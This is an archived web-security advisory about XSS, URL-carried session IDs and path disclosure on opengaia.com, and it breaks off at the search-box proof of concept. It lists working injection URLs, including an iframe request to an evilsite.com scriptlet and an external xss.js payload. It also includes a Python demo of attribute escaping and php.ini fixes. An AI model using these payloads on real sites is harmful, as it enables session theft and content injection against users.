TUCoPS :: Web :: Specific Sites :: b06-2914.htm

Opengaia.com - XSS Vuln & Session Include



Opengaia.com

Homepage:
http://www.opengaia.com

Affected files:
my_page.php
modele.php
editing your profile
the search input box
adding a diary/blog

------------------------------------=0D
=0D
Just like the onlinenode.com vulnerabilities, this site filters input in much the same way. Below is one way to create an XSS vuln by closing the surrounding quotes and injecting an open-ended iframe tag.
=0D
http://www.opengaia.com/my_page.php?viewed_id=6871'>'>[iframe tag stripped in archive]&langue=en&PHPSESSID=538f9354d24325a0bf3b293ddb469274

Note the PHPSESSID in the query string: the site carries the PHP session ID in its URLs, so it leaks through Referer headers and wherever a link is logged or shared, and a crafted link can hand a victim a chosen session ID. Setting session.use_only_cookies = 1 and session.use_trans_sid = 0 in php.ini stops PHP from accepting or emitting URL-based session IDs.
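The quote-closing technique above, the double-encoded modele.php request that fails later in this advisory, and the session ID carried in the URL can all be checked offline. The following is an added example (not part of the advisory and not opengaia.com's code): it decodes the two modele.php query strings quoted in this advisory exactly as PHP's $_GET would, echoes the name parameter into a hypothetical attribute-context template both raw and HTML-encoded, and flags whether a new iframe element appears. The two render_* templates, the helper names and the simplified PROFILE_URL are assumptions.

```python
"""Decode the advisory's payloads and show why attribute-context encoding
stops them.  Added example, not code from the advisory or from opengaia.com;
the two render_* templates are assumptions about how the site echoed `name`."""
import html
import re
from urllib.parse import parse_qs, urlsplit

# Query strings copied from the two modele.php requests in the advisory.
FAILED_REQUEST = ("connection=1&name=%27%27%22%3C%22%27%3E%3Ciframe%2520src%3D"
                  "http%3A%2F%2Fevilsite.com%2Fscriptlet.html%2520%3C%5C")
WORKING_REQUEST = ("connection=1&name=%22%3E%27%3E%3Ciframe+src%3Dhttp%3A%2F%2F"
                   "www.google.com%3E%3C%22&password=&page=home")
# my_page.php link from the advisory (payload removed), session ID in the query.
PROFILE_URL = ("http://www.opengaia.com/my_page.php?viewed_id=6871&langue=en"
               "&PHPSESSID=538f9354d24325a0bf3b293ddb469274")


def decode_name(query: str) -> str:
    """Return `name` after one round of URL decoding, as PHP's $_GET does.
    `+` becomes a space; `%2520` becomes the literal text `%20`, not a space."""
    return parse_qs(query, keep_blank_values=True)["name"][0]


def render_unsafe(name: str) -> str:
    """Hypothetical vulnerable template: the parameter is echoed raw inside a
    double-quoted attribute, so a leading `">` or `'>` closes the attribute
    and the tag, and whatever follows becomes new markup."""
    return f'<input type="text" name="name" value="{name}">'


def render_safe(name: str) -> str:
    """Hardened form: HTML-encode for the attribute context (the PHP
    equivalent is htmlspecialchars($name, ENT_QUOTES, 'UTF-8'))."""
    return f'<input type="text" name="name" value="{html.escape(name, quote=True)}">'


def injects_tag(markup: str, tag: str = "iframe") -> bool:
    """Crude detector: did a real `<tag` start tag (tag name followed by
    whitespace or `>`) appear in the rendered page?  `<iframe%20src` does not
    count, which is exactly why the double-encoded request failed."""
    return re.search(rf"<{tag}(\s|>)", markup, re.IGNORECASE) is not None


def session_in_url(url: str) -> bool:
    """True when the PHP session ID travels in the query string.  Such links
    leak the session through Referer headers, proxy logs and shared URLs."""
    return "PHPSESSID" in parse_qs(urlsplit(url).query)


if __name__ == "__main__":
    for label, query in (("double-encoded", FAILED_REQUEST), ("working", WORKING_REQUEST)):
        name = decode_name(query)
        print(f"{label}: name={name!r}")
        print("  raw echo injects iframe:    ", injects_tag(render_unsafe(name)))
        print("  encoded echo injects iframe:", injects_tag(render_safe(name)))
    print("session ID in URL:", session_in_url(PROFILE_URL))
```

Running it shows the working request producing a live iframe only through the raw template, the double-encoded request producing none in either template, and the profile link carrying its session ID in the query string.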
<iframe> tags also work in each .php file. Example:

http://www.opengaia.com/my_page.php?viewed_id=6871''"<"'>[iframe tag stripped in archive]<'<"">

modele.php XSS vuln:

With this request we get PHP warnings with full path disclosure, and the XSS does not fire. Note the %2520 in the payload: after one round of URL decoding the server sees <iframe%20src=..., which is not a valid tag, so no frame is rendered. The warnings come from include() calls on lines 243 and 247 of modele.php that try to open './', and they reveal the webroot path:

http://www.opengaia.com/modele.php?connection=1&name=%27%27%22%3C%22%27%3E%3Ciframe%2520src%3Dhttp%3A%2F%2Fevilsite.com%2Fscriptlet.html%2520%3C%5C

Warning: main(./): failed to open stream: Success in /home/user/public_html/modele.php on line 243
Warning: main(./): failed to open stream: Permission denied in /home/user/public_html/modele.php on line 243
Warning: main(): Failed opening './' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/encoree/public_html/modele.php on line 243
Warning: main(./): failed to open stream: Permission denied in /home/user/public_html/modele.php on line 247
Warning: main(./): failed to open stream: Permission denied in /home/user/public_html/modele.php on line 247
Warning: main(): Failed opening './' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/user/public_html/modele.php on line 247

Path disclosure of this kind is avoided by setting display_errors = Off in php.ini and logging errors to a file instead.

modele.php XSS vuln using an iframe tag (the name parameter decodes to ">'><iframe src=http://www.google.com><"):

http://www.opengaia.com/modele.php?connection=1&name=%22%3E%27%3E%3Ciframe+src%3Dhttp%3A%2F%2Fwww.google.com%3E%3C%22&password=&object_menu=&right=accueil.php&left=bienvenue.php&page=home&viewed_id=&fond=cccccc&langue=en&object_type=&filtre=

-------------------------------------

Editing your profile XSS with PHP session included:

The input boxes of the profile editor do not properly filter user input before echoing it back into the page.
For a PoC we use end tags and put the following (the tag around SRC= was stripped by the archive's HTML rendering):

<"<""> SRC=http://www.youfucktard.com/xss.js><"<"">

Screenshots of the PoC in action:

http://www.youfucktard.com/xsp/gaia2.jpg
http://www.youfucktard.com/xsp/gaia3.jpg

-----------------------------------

Search input box XSS vuln PoC:

In the search box try putting: